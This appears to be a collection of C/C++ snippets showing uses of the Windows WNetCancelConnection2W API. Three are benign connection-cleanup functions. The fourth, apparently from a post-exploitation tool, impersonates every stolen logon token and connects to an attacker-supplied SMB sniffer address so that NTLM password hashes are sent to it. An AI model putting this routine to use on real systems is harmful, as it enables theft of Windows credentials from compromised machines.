void DriveMapping::Disconnect(wchar_t aDriveLetter) { wchar_t drvTemplate[] = {aDriveLetter, L':', L'\0'}; DWORD result = WNetCancelConnection2W(drvTemplate, 0, TRUE); MOZ_ASSERT(result == NO_ERROR); }
void MRegistryBase::ConnectLocal() { if (bRemote) { if (sRemoteResource[0]) { WNetCancelConnection2W(sRemoteResource, 0, 0); } } bRemote = false; sRemoteServer[0] = 0; sRemoteResource[0] = 0; }
void SAL_CALL osl_freeSecurityHandle(oslSecurity Security) { if (Security) { oslSecurityImpl *pSecImpl = (oslSecurityImpl*)Security; if (pSecImpl->m_pNetResource != NULL) { WNetCancelConnection2W(pSecImpl->m_pNetResource->lpRemoteName, 0, sal_True); free(pSecImpl->m_pNetResource->lpRemoteName); free(pSecImpl->m_pNetResource); } if (pSecImpl->m_hToken) CloseHandle(pSecImpl->m_hToken); if ( pSecImpl->m_hProfile ) CloseHandle(pSecImpl->m_hProfile); free (pSecImpl); } }
// Send off hashes for all tokens to IP address with SMB sniffer running DWORD request_incognito_snarf_hashes(Remote *remote, Packet *packet) { DWORD num_tokens = 0, i; SavedToken *token_list = NULL; NETRESOURCEW nr; HANDLE saved_token; TOKEN_PRIVS token_privs; wchar_t conn_string[BUF_SIZE] = L"", domain_name[BUF_SIZE] = L"", return_value[BUF_SIZE] = L"", temp[BUF_SIZE] = L""; Packet *response = packet_create_response(packet); char *smb_sniffer_ip = packet_get_tlv_value_string(packet, TLV_TYPE_INCOGNITO_SERVERNAME); // Initialise net_resource structure (essentially just set ip to that of smb_sniffer) if (_snwprintf(conn_string, BUF_SIZE, L"\\\\%s", smb_sniffer_ip) == -1) { conn_string[BUF_SIZE - 1] = '\0'; } nr.dwType = RESOURCETYPE_ANY; nr.lpLocalName = NULL; nr.lpProvider = NULL; nr.lpRemoteName = conn_string; // Save current thread token if one is currently being impersonated if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &saved_token)) saved_token = INVALID_HANDLE_VALUE; token_list = get_token_list(&num_tokens, &token_privs); if (!token_list) { packet_transmit_response(GetLastError(), remote, response); goto cleanup; } // Use every token and get hashes by connecting to SMB sniffer for (i = 0; i < num_tokens; i++) { if (token_list[i].token) { get_domain_from_token(token_list[i].token, domain_name, BUF_SIZE); // If token is not "useless" local account connect to sniffer // XXX This may need some expansion to support other languages if (_wcsicmp(domain_name, L"NT AUTHORITY")) { // Impersonate token ImpersonateLoggedOnUser(token_list[i].token); // Cancel previous connection to ensure hashes are sent and existing connection isn't reused WNetCancelConnection2W(nr.lpRemoteName, 0, TRUE); // Connect to smb sniffer if (!WNetAddConnection2W(&nr, NULL, NULL, 0)) { // Revert to primary token RevertToSelf(); } } CloseHandle(token_list[i].token); } } packet_transmit_response(ERROR_SUCCESS, remote, response); cleanup: free(token_list); // Restore token impersonation if (saved_token != INVALID_HANDLE_VALUE) { ImpersonateLoggedOnUser(saved_token); } return ERROR_SUCCESS; }